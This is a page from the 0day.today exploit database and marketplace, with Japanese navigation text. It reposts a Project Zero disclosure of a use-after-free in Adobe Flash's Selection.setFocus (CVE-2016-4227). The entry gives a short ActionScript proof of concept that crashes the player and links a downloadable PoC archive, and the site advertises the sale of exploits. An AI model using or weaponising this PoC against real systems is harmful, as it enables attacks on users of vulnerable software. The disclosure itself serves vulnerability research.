[ ホーム ]  [ プライベート ]  [ エクスプロイトの危険 ]  [ discount ]  [ 金の取得 ]  [ プラットフォーム ]  [ 侵入テスト ]  [ 検索 ]  [ よくある質問 ]  [ コンタクト ]  [ スタイル ]  [ Prices in Gold ]   db: 39 443    
DB公式のFacebookを活用Inj3ct0r
DB公式ツイッターの活用Inj3ct0r
DB公式RSSチャンネルの活用Inj3ct0r
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - 最大、世界でのデータベースを利用します。
言語を選択してください:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
あなたは0day.today について知っておくべきこと:
  • 私たちは一つのメインのドメインを使用します。http://0day.today
  • 材料のほとんどは 完全に無料
  • あなたがしたい場合は エクスプロイトを購入 / V.I.P.を取得アクセス または任意の他のサービスのために支払います、
    あなたが購入したり、獲得する必要があります
We accept currencies: [contact admin to find more]
           
私たちはあなたの目的をハッキングするためのツールとして、私たちのサイトを利用したいので、行動のあらゆる種類のことでしていません あなたがアクセスする権限がありませんillegaly他のユーザーやウェブサイト禁止されますに影響を与えます あなたのデータを含め、あなたのアカウントが破棄されます。
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
私は0day.todayのユーザーを登録しています。私は将来的に、この画面を表示したくありません。
最初の何をしますか?
  1. 読みます [ 契約 ]
  2. 読みます [ 送信 ] ルール
  3. 訪問します [ よくある質問 ] ページ
  4. [ 登録 ] プロファイル
  5. GET [ ]
  6. あなたがしたい場合は [ 売り ]
  7. あなたがしたい場合は [ 買い ]
  8. あなたが失われた場合は [ アカウント ]
  9. ご質問 [ [email protected] ]


メインリンク


次の方法でご連絡することができます

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ 承認 ] [ 登録 ] [ アカウントの復元 ]
お問い合わせ
次の方法でご連絡することができます:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day.today Inj3ct0rエクスプロイト市場とエクスプロイトの危険は,データベースを利用します

Adobe Flash - Selection.setFocus Use-After-Free

著者
Google Security Research
リスク
[
セキュリティリスクミディアム
]
0day-ID
0day-ID-26124
カテゴリ
dos / poc
日付の追加
28-08-2016
CVE
CVE-2016-4227
プラットフォーム
multiple
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841
 
There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.
 
A minimal PoC follows:
 
var mc = this.createEmptyMovieClip( "mc", 1);
var f = Selection.setFocus;
mc.f = f;
mc.f({toString : func});
 
function func(){
     
    mc.removeMovieClip();
     
        // Fix heap here
 
    }
 
A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40307.zip

#  0day.today [2024-07-02]  #
にすべての提出物を送る
エクスプロイトの種類(ローカル,リモート,DoS攻撃,前記PoCなど)を購入し,販売データベースの活用Inj3ct0r mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team